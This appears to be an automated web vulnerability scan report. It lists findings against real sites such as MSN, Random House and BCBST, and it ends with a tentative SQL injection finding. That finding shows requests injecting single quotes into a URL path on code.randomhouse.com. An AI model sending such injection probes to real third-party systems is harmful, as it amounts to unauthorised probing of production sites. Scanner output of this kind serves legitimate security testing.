19.50. http://fls.doubleclick.net/activityi

19.51. http://fls.doubleclick.net/activityi

19.52. http://g.adspeed.net/ad.php

19.53. http://googleads.g.doubleclick.net/pagead/ads

19.54. http://googleads.g.doubleclick.net/pagead/ads

19.55. http://googleads.g.doubleclick.net/pagead/ads

19.56. http://googleads.g.doubleclick.net/pagead/ads

19.57. http://googleads.g.doubleclick.net/pagead/ads

19.58. http://googleads.g.doubleclick.net/pagead/ads

19.59. http://googleads.g.doubleclick.net/pagead/ads

19.60. http://googleads.g.doubleclick.net/pagead/ads

19.61. http://lifestyle.msn.com/FeedPageFinal.aspx

19.62. http://m.adnxs.com/tt

19.63. http://m.adnxs.com/tt

19.64. http://matrix.itasoftware.com/js/sites/matrix/nls/site_en-us.js

19.65. http://matrix.itasoftware.com/view/details

19.66. http://money.msn.com/market-news/default.aspx

19.67. http://money.msn.com/market-news/default.aspx

19.68. http://money.msn.com/market-news/post.aspx

19.69. http://money.msn.com/market-news/post.aspx

19.70. http://money.msn.com/tax-tips/post.aspx

19.71. http://moxieinsight.com/

19.72. http://p.widgetserver.com/p/fetch/origin==http%3A%2F%2Ftwitter.com%2Fstatuses%2Fuser_timeline%2Faidswalkboston.atom

19.73. http://p.widgetserver.com/p/fetch/origin==http%3A%2F%2Fwww.facebook.com%2Ffeeds%2Fpage.php%3Fformat%3Datom10%26id%3D95922227750

19.74. http://pixel.fetchback.com/serve/fb/pdc

19.75. http://rad.msn.com/ADSAdClient31.dll

19.76. http://rad.msn.com/ADSAdClient31.dll

19.77. http://rad.msn.com/ADSAdClient31.dll

19.78. http://rad.msn.com/ADSAdClient31.dll

19.79. http://rad.msn.com/ADSAdClient31.dll

19.80. http://rad.msn.com/ADSAdClient31.dll

19.81. http://rad.msn.com/ADSAdClient31.dll

19.82. http://rad.msn.com/ADSAdClient31.dll

19.83. http://rad.msn.com/ADSAdClient31.dll

19.84. http://rad.msn.com/ADSAdClient31.dll

19.85. http://rad.msn.com/ADSAdClient31.dll

19.86. http://rad.msn.com/ADSAdClient31.dll

19.87. http://rad.msn.com/ADSAdClient31.dll

19.88. http://rad.msn.com/ADSAdClient31.dll

19.89. http://rad.msn.com/ADSAdClient31.dll

19.90. http://rad.msn.com/ADSAdClient31.dll

19.91. http://rad.msn.com/ADSAdClient31.dll

19.92. http://rad.msn.com/ADSAdClient31.dll

19.93. http://rad.msn.com/ADSAdClient31.dll

19.94. http://rad.msn.com/ADSAdClient31.dll

19.95. http://realestate.msn.com/article.aspx

19.96. http://recs.richrelevance.com/rrserver/p13n_generated.js

19.97. http://recs.richrelevance.com/rrserver/p13n_generated.js

19.98. http://recs.richrelevance.com/rrserver/p13n_generated.js

19.99. http://recs.richrelevance.com/rrserver/p13n_generated.js

19.100. http://recs.richrelevance.com/rrserver/p13n_generated.js

19.101. http://recs.richrelevance.com/rrserver/p13n_generated.js

19.102. http://recs.richrelevance.com/rrserver/p13n_generated.js

19.103. http://recs.richrelevance.com/rrserver/p13n_generated.js

19.104. http://recs.richrelevance.com/rrserver/p13n_generated.js

19.105. http://recs.richrelevance.com/rrserver/p13n_generated.js

19.106. http://recs.richrelevance.com/rrserver/p13n_generated.js

19.107. http://recs.richrelevance.com/rrserver/p13n_generated.js

19.108. https://secure.bundle.com/Membership/LogOn

19.109. http://theinvestedlife.msn.com/

19.110. http://west.thomson.com/Error/500Error.aspx

19.111. http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx

19.112. http://west.thomson.com/store/secure/ShoppingBasket.aspx

19.113. http://west.thomson.com/store/secure/ShoppingBasket.aspx

19.114. http://west.thomson.com/support/contact-us/default.aspx

19.115. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx

19.116. https://west.thomson.com/store/secure/ShippingInfo.aspx

19.117. http://www.aac.org/site/TR/Events/AWB08

19.118. http://www.allpages.com/

19.119. http://www.aptm.phoenix.edu/

19.120. https://www.bcbst.com/accounttools/public/askUserId.do

19.121. http://www.bertelsmann.com/bertelsmann_corp/wms41/bm/index.php

19.122. http://www.bing.com/

19.123. http://www.bing.com/sck

19.124. http://www.bing.com/sck

19.125. http://www.bing.com/sck

19.126. http://www.careerbuilder.com/iframe/recommendedcvupload.aspx

19.127. http://www.computerworld.com/s/article/9216003/Texas_fires_two_tech_chiefs_over_breach

19.128. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/

19.129. http://www.facebook.com/plugins/like.php

19.130. http://www.facebook.com/plugins/like.php

19.131. http://www.freemanco.com/freemanco/

19.132. http://www.google.com/search

19.133. http://www.google.com/search

19.134. http://www.google.com/search

19.135. http://www.magellangps.com/s.nl

19.136. http://www.msn.com/

19.137. http://www.msn.com/

19.138. http://www.msn.com/sck.aspx

19.139. http://www.omniture.com/modules/creative_zones/display.html

19.140. http://www.omniture.com/offer/943

19.141. http://www.randomhouse.com/about/faq/index.php

19.142. http://www.realtor.com/search/widgetportal/Widget.aspx

19.143. http://www.res-x.com/%22http://www.randomhouse.com/images/dyn/cover/

20. Cross-domain script include

20.1. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14

20.2. http://ad.doubleclick.net/adi/N5092.152847.MICROSOFTADVERTISIN/B5103858.21

20.3. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105

20.4. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105

20.5. http://advertising.microsoft.com/home

20.6. http://analytics.live.com/Sync.html

20.7. http://blog.widgetbox.com/

20.8. https://checkout.netsuite.com/s.nl

20.9. http://ecommerce.randomhouse.com/cart.do

20.10. https://ecommerce.randomhouse.com//account.do

20.11. https://ecommerce.randomhouse.com//create-address.do

20.12. https://ecommerce.randomhouse.com//email-password.do

20.13. https://ecommerce.randomhouse.com//select-address.do

20.14. https://ecommerce.randomhouse.com//view-orders.do

20.15. https://ecommerce.randomhouse.com/account.do

20.16. https://ecommerce.randomhouse.com/create-account-submit.do

20.17. https://ecommerce.randomhouse.com/create-account.do

20.18. https://ecommerce.randomhouse.com/password.do

20.19. https://ecommerce.randomhouse.com/sign-in-submit.do

20.20. https://ecommerce.randomhouse.com/sign-in.do

20.21. http://explore.live.com/windows-live-messenger

20.22. http://fls.doubleclick.net/activityi

20.23. http://fls.doubleclick.net/activityi

20.24. http://g.adspeed.net/ad.php

20.25. http://googleads.g.doubleclick.net/pagead/ads

20.26. http://googleads.g.doubleclick.net/pagead/ads

20.27. http://health.msn.com/

20.28. http://lifestyle.msn.com/

20.29. http://m.adnxs.com/tt

20.30. http://m.adnxs.com/tt

20.31. http://matrix.itasoftware.com/

20.32. http://matrix.itasoftware.com/view/details

20.33. http://money.msn.com/

20.34. http://money.msn.com/ResponseBridge.aspx

20.35. http://money.msn.com/investing/

20.36. http://money.msn.com/market-news/default.aspx

20.37. http://money.msn.com/market-news/post.aspx

20.38. http://money.msn.com/personal-finance/

20.39. http://money.msn.com/tax-tips/post.aspx

20.40. http://money.msn.com/taxes/

20.41. http://moxieinsight.com/

20.42. http://moxieinsight.com/

20.43. http://msn.careerbuilder.com/msn/default.aspx

20.44. https://my.omniture.com/login/

20.45. http://pixel.fetchback.com/serve/fb/pdc

20.46. http://realestate.msn.com/

20.47. http://realestate.msn.com/article.aspx

20.48. http://seclists.org/fulldisclosure/2011/Apr/388

20.49. https://secure.bundle.com/Membership/LogOn

20.50. https://secure.bundle.com/msn

20.51. http://social.msn.com/boards/RequestBridge.aspx

20.52. http://theinvestedlife.msn.com/

20.53. http://us.social.s-msn.com/s/js/16/ue.min.js

20.54. http://west.thomson.com/Error/500Error.aspx

20.55. http://west.thomson.com/default.aspx

20.56. http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx

20.57. http://west.thomson.com/store/secure/ShoppingBasket.aspx

20.58. http://west.thomson.com/support/contact-us/default.aspx

20.59. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx

20.60. https://west.thomson.com/store/secure/EmptyBasket.aspx

20.61. https://west.thomson.com/store/secure/ShippingInfo.aspx

20.62. https://west.thomson.com/support/customer-service/order-info.aspx

20.63. http://www.aac.org/site/TR/Events/AWB08

20.64. http://www.allpages.com/

20.65. http://www.allpages.com/agriculture/farm-equipment/

20.66. http://www.aptm.phoenix.edu/

20.67. http://www.bertelsmann.com/bertelsmann_corp/wms41/bm/index.php

20.68. http://www.careerbuilder.com/iframe/recommendedcvupload.aspx

20.69. http://www.computerworld.com/s/article/9216003/Texas_fires_two_tech_chiefs_over_breach

20.70. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/

20.71. http://www.criticalwatch.com/vulnerability-management.aspx

20.72. http://www.facebook.com/plugins/like.php

20.73. http://www.magellangps.com/

20.74. http://www.magellangps.com/Products/eXploristseries

20.75. http://www.magellangps.com/s.nl

20.76. http://www.moxiesoft.com/tal_about/contact.aspx

20.77. http://www.moxiesoft.com/tal_products/employee-spaces.aspx

20.78. http://www.moxiesoft.com/tal_products/knowledgebase.aspx

20.79. http://www.msn.com/

20.80. http://www.msn.com/sck.aspx

20.81. http://www.myhomemsn.com/

20.82. http://www.randomhouse.com/

20.83. http://www.randomhouse.com/about/contact.html

20.84. http://www.randomhouse.com/about/faq/

20.85. http://www.randomhouse.com/about/faq/index.php

20.86. http://www.realtor.com/search/widgetportal/Widget.aspx

20.87. http://www.widgetbox.com/

20.88. http://www.widgetbox.com/list/most_popular

20.89. http://www.widgetbox.com/mobile/

20.90. http://www.widgetbox.com/mobile/builder/

20.91. http://www.widgetbox.com/widgets/make/

21. File upload functionality

21.1. http://mediacdn.disqus.com/1303851120/build/system/upload.html

21.2. http://www.careerbuilder.com/iframe/recommendedcvupload.aspx

22. TRACE method is enabled

22.1. http://amch.questionmarket.com/

22.2. http://tracking.hubspot.com/

22.3. http://www.bertelsmann.com/

23. Database connection string disclosed

24. Email addresses disclosed

24.1. http://ads1.msn.com/ads/abuimg/clear1.gif

24.2. http://ads1.msn.com/library/dap.js

24.3. http://ads1.msn.com/library/dapmsn.js

24.4. http://advertising.microsoft.com/home

24.5. http://blog.widgetbox.com/

24.6. http://cdn.widgetserver.com/syndication/mobilejs/mapp_future.js

24.7. https://checkout.netsuite.com/c.1142057/site/js/general-scripts.js

24.8. http://ecommerce.randomhouse.com/store/js/rh/ecom.js

24.9. http://ecommerce.randomhouse.com/store/js/rh/prototype.js

24.10. http://ecommerce.randomhouse.com/store/js/rh/s_code.js

24.11. https://ecommerce.randomhouse.com//store/js/rh/ecom.js

24.12. https://ecommerce.randomhouse.com//store/js/rh/prototype.js

24.13. https://ecommerce.randomhouse.com//store/js/rh/s_code.js

24.14. https://ecommerce.randomhouse.com/store/js/rh/ecom.js

24.15. https://ecommerce.randomhouse.com/store/js/rh/prototype.js

24.16. https://ecommerce.randomhouse.com/store/js/rh/s_code.js

24.17. http://global.msads.net/defaultads/ads/defaultads/1402.gif

24.18. http://kbportal.thomson.com/js/autoComplete.js

24.19. http://matrix.itasoftware.com/js/sites/matrix/nls/site_en-us.js

24.20. http://media.computerworlduk.com/scripts/s_code.js

24.21. http://mediacdn.disqus.com/1303851120/build/system/disqus.js

24.22. http://moxieinsight.com/

24.23. https://myaccount.west.thomson.com/MYACCOUNT/Scripts/date.js

24.24. https://myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn

24.25. http://pub.widgetbox.com/scripts/jquery/jquery.jodometer.min.js

24.26. http://scripts.omniture.com/javascript.js

24.27. https://secure.bundle.com/assets/js/build/global.min.js

24.28. http://static.move.com/lib/rdc/6.0.10_P1A/common.js

24.29. http://support.moxiesoft.com/

24.30. http://support.moxiesoft.com/tal_includes/generalfunctions.js

24.31. http://west.thomson.com/support/contact-us/default.aspx

24.32. http://www.aac.org/css/FriendraiserUserStyle.css

24.33. http://www.bcbst.com/js/accordian/jquery.dimensions.js

24.34. https://www.bcbst.com/brokers/group/

24.35. https://www.bcbst.com/brokers/individual/

24.36. http://www.bertelsmann.com/bertelsmann_corp/wms41/inc/AJAX_MUZ_Statistics.server.php

24.37. http://www.bertelsmann.com/bertelsmann_corp/wms41/js/scripts.js

24.38. http://www.cargill.com/company/financial/index.jsp

24.39. http://www.computerworld.com/s/article/9216003/Texas_fires_two_tech_chiefs_over_breach

24.40. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/

24.41. http://www.freemanco.com/freemanco/javascript/image-slideshow.js

24.42. http://www.freemanco.com/freemanco/javascript/jquery/jquery.dataTables.js

24.43. http://www.freemanco.com/images/favicon.ico

24.44. http://www.freemanco.com/images/site/small-logo.ico

24.45. http://www.freemanco.com/store/

24.46. http://www.freemanco.com/store/customer/customerSearch.jsp

24.47. http://www.freemanco.com/store/user/forgetUserName.jsp

24.48. https://www.freemanco.com/store/index.jsp

24.49. http://www.itasoftware.com/news-events/

24.50. http://www.itasoftware.com/scripts/hoverIntent.js

24.51. http://www.itasoftware.com/scripts/jquery.mousewheel.js

24.52. http://www.magellangps.com/lp/eXploristfamily/css/styles.css

24.53. http://www.magellangps.com/lp/eXploristfamily/js/main.js

24.54. http://www.magellangps.com/site/js/general-scripts.js

24.55. http://www.moxiesoft.com/tal_about/aboutus.aspx

24.56. http://www.moxiesoft.com/tal_about/contact.aspx

24.57. http://www.moxiesoft.com/tal_news/events-resources.aspx

24.58. http://www.moxiesoft.com/tal_products/employee-spaces.aspx

24.59. http://www.moxiesoft.com/tal_products/kbdemo/

24.60. http://www.moxiesoft.com/tal_products/kbdemo/moxie_v2.swf

24.61. http://www.moxiesoft.com/tal_products/knowledgebase.aspx

24.62. http://www.moxiesoft.com/tal_products/products.aspx

24.63. http://www.moxiesoft.com/tal_products/spaces-assets/colorbox/jquery.colorbox.js

24.64. http://www.randomhouse.com/about/contact.html

25. Private IP addresses disclosed

25.1. http://c.homestore.com/srv/oreo

25.2. http://c.realtor.com/srv/sugar

25.3. http://p.widgetserver.com/p/fetch/origin==http%3A%2F%2Fwww.facebook.com%2Ffeeds%2Fpage.php%3Fformat%3Datom10%26id%3D95922227750

25.4. http://reviews.west.thomson.com/logging

25.5. http://static.ak.connect.facebook.com/connect.php/en_US

25.6. http://static.ak.connect.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

25.7. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

25.8. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

25.9. http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

25.10. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.11. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.12. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/Y7YCBKX-HZn.swf

25.13. http://static.ak.fbcdn.net/rsrc.php/v1/zL/r/FGFbc80dUKj.png

25.14. http://www.facebook.com/extern/login_status.php

25.15. http://www.facebook.com/extern/login_status.php

25.16. http://www.facebook.com/extern/login_status.php

25.17. http://www.facebook.com/extern/login_status.php

25.18. http://www.facebook.com/extern/login_status.php

25.19. http://www.facebook.com/extern/login_status.php

25.20. http://www.facebook.com/extern/login_status.php

25.21. http://www.facebook.com/extern/login_status.php

25.22. http://www.facebook.com/extern/login_status.php

25.23. http://www.facebook.com/extern/login_status.php

25.24. http://www.facebook.com/extern/login_status.php

25.25. http://www.facebook.com/extern/login_status.php

25.26. http://www.facebook.com/extern/login_status.php

25.27. http://www.facebook.com/plugins/like.php

25.28. http://www.facebook.com/plugins/like.php

25.29. http://www.facebook.com/plugins/like.php

25.30. http://www.facebook.com/plugins/like.php

25.31. http://www.facebook.com/plugins/like.php

25.32. http://www.facebook.com/plugins/like.php

25.33. http://www.google.com/sdch/rU20-FBA.dct

25.34. http://www.realtor.com/search/widgetportal/Widget.aspx

26. Robots.txt file

26.1. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3

26.2. http://amch.questionmarket.com/adsc/d890935/20/892222/randm.js

26.3. http://api.bing.com/qsonhs.aspx

26.4. http://b.scorecardresearch.com/b

26.5. http://b.voicefive.com/b

26.6. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

26.7. http://fonts.googleapis.com/css

26.8. http://freemanco.com/

26.9. http://investing.money.msn.com/mv/MarketStatus

26.10. http://l.addthiscdn.com/live/t00/120lo.gif

26.11. http://money.msn.com/

26.12. http://moneycentral.msn.com/inc/css/ww.css

26.13. http://moxieinsight.com/

26.14. http://now.eloqua.com/visitor/v200/svrGP.aspx

26.15. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard

26.16. http://rad.msn.com/ADSAdClient31.dll

26.17. http://s7.addthis.com/js/addthis_widget.php

26.18. http://spe.atdmt.com/ds/AANYCCITICIT/2011_Continuity_Revised/BND_Trapeze2011_FL_300x250_RV2_MSN.swf

26.19. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

26.20. http://themes.googleusercontent.com/font

26.21. http://www.actonsoftware.com/acton/bn/1091/visitor.gif

26.22. https://www.bcbst.com/accounttools/public/askUserId.do

26.23. http://www.freemanco.com/store

26.24. https://www.freemanco.com/store/index.jsp

26.25. http://www.interspire.com/activekb/

26.26. http://www.itasoftware.com/style.css

26.27. http://www.magellangps.com/

26.28. http://www.msn.com/

26.29. http://www.omniture.com/en/products/conversion/testandtarget

27. Cacheable HTTPS response

27.1. https://checkout.netsuite.com/empty.html

27.2. https://ecommerce.randomhouse.com//account.do

27.3. https://ecommerce.randomhouse.com//create-address.do

27.4. https://ecommerce.randomhouse.com//email-password.do

27.5. https://ecommerce.randomhouse.com//select-address.do

27.6. https://ecommerce.randomhouse.com//view-orders.do

27.7. https://ecommerce.randomhouse.com/account.do

27.8. https://ecommerce.randomhouse.com/address-validator.do

27.9. https://ecommerce.randomhouse.com/create-account-submit.do

27.10. https://ecommerce.randomhouse.com/create-account.do

27.11. https://ecommerce.randomhouse.com/password.do

27.12. https://ecommerce.randomhouse.com/sign-in-submit.do

27.13. https://ecommerce.randomhouse.com/sign-in.do

27.14. https://my.omniture.com/login/

27.15. https://myaccount.west.thomson.com/MYACCOUNT/css/font/knowledgelight-webfont-2010.ttf

27.16. https://secure.bundle.com/XmlContent/Carouselpage.xml

27.17. https://west.thomson.com/noexpire/font/knowledgebold-webfont-2010.woff

27.18. https://west.thomson.com/noexpire/font/knowledgelight-webfont-2010.woff

27.19. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx

27.20. https://west.thomson.com/store/secure/EmptyBasket.aspx

27.21. https://west.thomson.com/store/secure/ShippingInfo.aspx

27.22. https://west.thomson.com/support/customer-service/order-info.aspx

27.23. https://www.bcbst.com/accounttools/public/askUserId.do

27.24. https://www.bcbst.com/brokers/dental/

27.25. https://www.bcbst.com/brokers/group/

27.26. https://www.bcbst.com/brokers/individual/

27.27. https://www.bcbst.com/employers/dental/

27.28. https://www.bcbst.com/employers/vision/

27.29. https://www.bcbst.com/inc/loginform.asp

27.30. https://www.bcbst.com/members/

27.31. https://www.bcbst.com/members/dental/

27.32. https://www.bcbst.com/members/vision/

27.33. https://www.bcbst.com/secure/public/InvalidAccess.shtm

27.34. https://www.bcbst.com/secure/public/login.asp

27.35. https://www.freemanco.com/store/checkout/includes/stateRestriction.jsp

27.36. https://www.freemanco.com/store/index.jsp

27.37. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx

27.38. https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx

28. HTML does not specify charset

28.1. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14

28.2. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3

28.3. http://ad.doubleclick.net/adi/N5092.152847.MICROSOFTADVERTISIN/B5103858.21

28.4. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105

28.5. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25

28.6. http://ad.uk.doubleclick.net/adi/ads.idg.co.uk/cw-welcome

28.7. http://amch.questionmarket.com/adsc/d840009/7/41115363/decide.php

28.8. http://amch.questionmarket.com/adscgen/st.php

28.9. http://analytics.live.com/Sync.html

28.10. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

28.11. http://fls.doubleclick.net/activityi

28.12. http://freemanco.com/

28.13. http://g.adspeed.net/ad.php

28.14. http://kbportal.thomson.com/display/2/_dividerFrame.html

28.15. http://kbportal.thomson.com/display/2/leftframe_files/_greybar.html

28.16. http://kbportal.thomson.com/pc/12/categoryList/21/2/cat_index.html

28.17. http://kbportal.thomson.com/pc/12/categoryList/88/2/cat_index.html

28.18. http://mediacdn.disqus.com/1303851120/build/system/def.html

28.19. http://mediacdn.disqus.com/1303851120/build/system/reply.html

28.20. http://mediacdn.disqus.com/1303851120/build/system/upload.html

28.21. http://moxieinsight.com/

28.22. http://now.eloqua.com/visitor/v200/svrGP.aspx

28.23. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard

28.24. http://recs.richrelevance.com/favicon.ico

28.25. http://support.moxiesoft.com/

28.26. http://video.od.visiblemeasures.com/log

28.27. http://view.c3metrics.com/v.js

28.28. http://wd.sharethis.com/api/getApi.php

28.29. http://www.bcbst.com/inc/loginform.asp

28.30. https://www.bcbst.com/inc/loginform.asp

29. Content type incorrectly stated

29.1. http://a.rad.msn.com/ADSAdClient31.dll

29.2. http://ac3.msn.com/de.ashx

29.3. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**

29.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806

29.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**

29.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**

29.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628

29.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152

29.9. http://amch.questionmarket.com/adsc/d743529/2/743550/randm.js

29.10. http://amch.questionmarket.com/adsc/d743529/3/743551/randm.js

29.11. http://amch.questionmarket.com/adsc/d840009/7/41115363/decide.php

29.12. http://amch.questionmarket.com/adscgen/st.php

29.13. http://ar.voicefive.com/b/rc.pli

29.14. http://b.rad.msn.com/ADSAdClient31.dll

29.15. http://blstc.msn.com/br/chan/css/cntwmodule.2010.29.09.css

29.16. http://blstj.msn.com/br/chan/js/chan_slidesurvey.2008.01.02.js

29.17. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

29.18. http://freemanco.app5.hubspot.com/salog.js.aspx

29.19. http://images.west.thomson.com/buttons/tr_logo_small.jpg

29.20. http://img.icbdr.com/MediaManagement/3J/Mwg7SF78N5DWGML7B3J.jpg

29.21. http://img.icbdr.com/MediaManagement/91/MVM8635VX05HXYWXW91.jpg

29.22. http://img.icbdr.com/images/custom/msn/Calculator2.jpg

29.23. http://img.icbdr.com/images/custom/msn/Socialmediaoverload.jpg

29.24. http://img.icbdr.com/images/custom/msn/words.jpg

29.25. http://img1.newser.com/image/106040-0-20080520120727.jpeg

29.26. http://img1.newser.com/image/5830-0-20070530122616.jpeg

29.27. http://img1.newser.com/image/6028-0-20070530123754.jpeg

29.28. http://img1.newser.com/image/94280-0-20080414104938.jpeg

29.29. http://img2.newser.com/image/6211-0-20070530125015.jpeg

29.30. http://investing.money.msn.com/mv/MarketStatus

29.31. http://investing.money.msn.com/mv/RecentQuotes/

29.32. http://kbportal.thomson.com/display/2/homepage.aspx

29.33. http://lifestyle.msn.com/FeedPageFinal.aspx

29.34. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

29.35. http://matrix.itasoftware.com/favicon.ico

29.36. http://matrix.itasoftware.com/geosearch/service/json/suggest/citiesAndAirports

29.37. https://myaccount.west.thomson.com/MYACCOUNT/Scripts/globinfo/jQuery.glob.all.min.js

29.38. http://now.eloqua.com/visitor/v200/svrGP.aspx

29.39. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard

29.40. http://pub2.widgetbox.com/css/fonts/LithoAntique-DemiBold-webfont.woff

29.41. http://pub2.widgetbox.com/images/favicon.ico

29.42. http://rad.msn.com/ADSAdClient31.dll

29.43. http://s7.addthis.com/js/addthis_widget.php

29.44. http://sales.liveperson.net/hcp/html/mTag.js

29.45. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php

29.46. http://survey.112.2o7.net/survey/dynamic/suites/274/omniturecom/list.js

29.47. http://video.od.visiblemeasures.com/log

29.48. http://view.c3metrics.com/v.js

29.49. http://vms.msn.com/vms.aspx

29.50. http://wd.sharethis.com/api/getApi.php

29.51. http://widgetserver.com/favicon.ico

29.52. http://www.allpages.com/css/favicon.ico

29.53. http://www.aptm.phoenix.edu/AptiNet/DynamicSelect

29.54. http://www.bcbst.com/billboard/mobile.jpg

29.55. https://www.bcbst.com/accounttools/public/0

29.56. http://www.bing.com/sck

29.57. http://www.cargill.com/wcm/fragments/ccom_home_flash_static_list/slideshow.swf

29.58. http://www.cargill.com/wcm/fragments/ccom_landing_flash_static_list/slideshow_650x292.swf

29.59. http://www.cargill.com/wcm/groups/public/@ss-assets/documents/script/ccom_home_flash_param_gen_params_NextRowSS_DATAFILE-val-NA3025330-pmr-pageLevel-val-1.jsp

29.60. http://www.cargill.com/wcm/groups/public/@ss-assets/documents/script/ccom_landing_flash_param_gen_params_NextRowSS_DATAFILE-val-NA3018658-pmr-pageLevel-val-2.jsp

29.61. http://www.freemanco.com/store/global/util/stateRestriction.jsp

29.62. http://www.freemanco.com/store/includes/ajax/loginOrNot.jsp

29.63. https://www.freemanco.com/store/checkout/includes/stateRestriction.jsp

29.64. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx

29.65. http://www.google.com/search

29.66. http://www.itasoftware.com/favicon.ico

29.67. http://www.itasoftware.com/scripts/highslide/graphics/zoomout.cur

29.68. http://www.omniture.com/listener.html

29.69. http://www.omniture.com/modules/creative_zones/display.html

29.70. http://www.omniture.com/modules/json/picklist.json.php

29.71. http://www.randomhouse.com/art/bw06/base/top_right_corner.png

29.72. http://www.res-x.com/ws/r2/Resonance.aspx

30. Content type is not specified

30.1. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard

30.2. http://realestate.msn.us.intellitxt.com/favicon.ico

31. SSL certificate

31.1. https://my.omniture.com/

31.2. https://www.bcbst.com/

31.3. https://www.freemanco.com/



1. SQL injection  next
There are 19 instances of this issue:


1.1. http://code.randomhouse.com/b/ss/ranhcorporate,ranhrollup/1/H.17/s72574234255265 [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://code.randomhouse.com
Path:   /b/ss/ranhcorporate,ranhrollup/1/H.17/s72574234255265

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/ranhcorporate,ranhrollup/1/H.17/s72574234255265?AQB=1&ndh=1&t=26/3/2011%2017%3A16%3A38%202%20300&ns=randomhouse&pageName=cart&g=about%3Ablank&cc=USD&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=https%3A//seal.verisign.com/splash&pid=cart&pidt=1&oid=https%3A//seal.verisign.com/splash%3Fform_file%3Dfdf/splash.fdf%26dn%3Decommerce.randomhouse.com%26lang%3Den&ot=A&oi=163&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: code.randomhouse.com
Cookie: s_vi=[CS]v1|26DBA10E051D2A33-400001336000A416[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 22:31:57 GMT
Server: Omniture DC/2.0.0
Content-Length: 451
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/ranhcorporate,ranhrollup/1/H.17/s7257423425526
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/ranhcorporate,ranhrollup/1/H.17/s72574234255265?AQB=1&ndh=1&t=26/3/2011%2017%3A16%3A38%202%20300&ns=randomhouse&pageName=cart&g=about%3Ablank&cc=USD&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=https%3A//seal.verisign.com/splash&pid=cart&pidt=1&oid=https%3A//seal.verisign.com/splash%3Fform_file%3Dfdf/splash.fdf%26dn%3Decommerce.randomhouse.com%26lang%3Den&ot=A&oi=163&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
